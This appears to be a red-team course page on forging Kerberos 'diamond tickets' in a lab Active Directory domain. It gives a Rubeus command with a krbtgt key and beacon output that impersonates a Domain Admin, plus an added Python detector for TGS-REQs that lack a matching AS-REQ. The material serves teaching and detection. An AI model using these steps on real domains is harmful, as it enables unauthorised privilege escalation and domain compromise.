# Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT that can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of the domain, and then passed into a logon session for use. Because domain controllers do not keep track of the TGTs they have legitimately issued, they will happily accept any TGT that is encrypted with their own krbtgt hash. A possible tactic to detect the use of golden tickets is therefore to look for TGS-REQs that have no corresponding AS-REQ.

A "diamond ticket" is instead made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, and then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket, because any TGS-REQs will be preceded by a legitimate AS-REQ.
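The detection described above, as an added example that is not part of the course material: correlate the DC's TGT requests (Windows Security event 4768, an AS-REQ) with service ticket requests (event 4769, a TGS-REQ) and flag any TGS-REQ that has no AS-REQ within a TGT lifetime before it. The log field names and sample records are constructed for this example. It goes one step beyond the page by letting the correlation key be the account name instead of the client address, which shows that a diamond ticket's "preceding AS-REQ" belongs to the original user, not to the user the modified ticket names.

```python
from datetime import datetime, timedelta

# Constructed sample records modelled on the Windows Security events a DC writes for
# Kerberos traffic: 4768 (TGT requested, i.e. an AS-REQ) and 4769 (service ticket
# requested, i.e. a TGS-REQ). Field names are this example's own, not a real schema.
SAMPLE_EVENTS = [
    {"time": "2022-07-07T08:30:00", "id": 4768, "account": "bfarmer", "client": "10.10.17.231"},
    {"time": "2022-07-07T08:45:00", "id": 4769, "account": "bfarmer", "client": "10.10.17.231"},
    # Golden-ticket pattern: a TGS-REQ from a host that never sent an AS-REQ.
    {"time": "2022-07-07T09:05:10", "id": 4769, "account": "nlamb", "client": "10.10.17.50"},
    # Diamond-ticket pattern: the host that obtained bfarmer's TGT now presents a TGT
    # naming nlamb. An AS-REQ precedes it, but not for the account the ticket carries.
    {"time": "2022-07-07T09:10:00", "id": 4769, "account": "nlamb", "client": "10.10.17.231"},
    # A TGS-REQ long after the only AS-REQ, outside the 10-hour TGT lifetime.
    {"time": "2022-07-08T07:00:00", "id": 4769, "account": "bfarmer", "client": "10.10.17.231"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def tgs_without_as(events, key=lambda e: e["client"], window=timedelta(hours=10)):
    """Return the 4769 events with no 4768 of the same key within `window` before them.

    `key` decides what "corresponding" means: the requesting client address by default
    (the page's wording), or the account name to tie each TGS-REQ to the identity it
    asserts. `window` defaults to the 10-hour TGT lifetime seen on the page's ticket.
    """
    as_reqs = {}  # key -> list of AS-REQ timestamps
    for e in sorted(events, key=_ts):
        if e["id"] == 4768:
            as_reqs.setdefault(key(e), []).append(_ts(e))
    flagged = []
    for e in sorted(events, key=_ts):
        if e["id"] != 4769:
            continue
        t = _ts(e)
        if not any(t - window <= a <= t for a in as_reqs.get(key(e), [])):
            flagged.append(e)
    return flagged


if __name__ == "__main__":
    for e in tgs_without_as(SAMPLE_EVENTS):
        print("no AS-REQ from client :", e)
    for e in tgs_without_as(SAMPLE_EVENTS, key=lambda e: e["account"]):
        print("no AS-REQ for account :", e)
```

Keyed by client, the diamond ticket is not flagged, exactly as the page says; keyed by account, it is, because no AS-REQ was ever made for nlamb.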

First, we prove we have no access to the DC.

```
beacon> getuid
[*] You are DEV\bfarmer

beacon> ls \\dc-2.dev.cyberbotic.io\c$
[-] could not open \\dc-2.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
```

Diamond tickets can be created with Rubeus.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap
```

Where:

* `/tgtdeleg` uses the Kerberos GSS-API to obtain a usable TGT for the current user without needing to know their password or NTLM/AES hash, and without elevation on the host.
* `/ticketuser` is the username of the user to impersonate.
* `/ticketuserid` is the domain RID of that user.
* `/groups` is the list of desired group RIDs (512 being Domain Admins).
* `/krbkey` is the krbtgt AES256 hash.

```
[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc-2.dev.cyberbotic.io'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: +mzV4aOvQx3/dpZGBaVEhccq1t+jhKi8oeCYXkjHXw4=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFgz [...snip...] MuSU8=

[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

      doIFYj [...snip...] MuSU8=
```

Rubeus `describe` will now show that this is a TGT for the target user.

```
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...snip...]MuSU8=

[*] Action: Describe Ticket

  ServiceName              :  krbtgt/DEV.CYBERBOTIC.IO
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  7/7/2022 8:41:46 AM
  EndTime                  :  7/7/2022 6:41:46 PM
  RenewTill                :  1/1/1970 12:00:00 AM
  Flags                    :  name_canonicalize, pre_authent, forwarded, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  jp4k3G5LvXpIl3cuAnTtgLuxOWkPJIUjOEZB5wrHdVw=
```
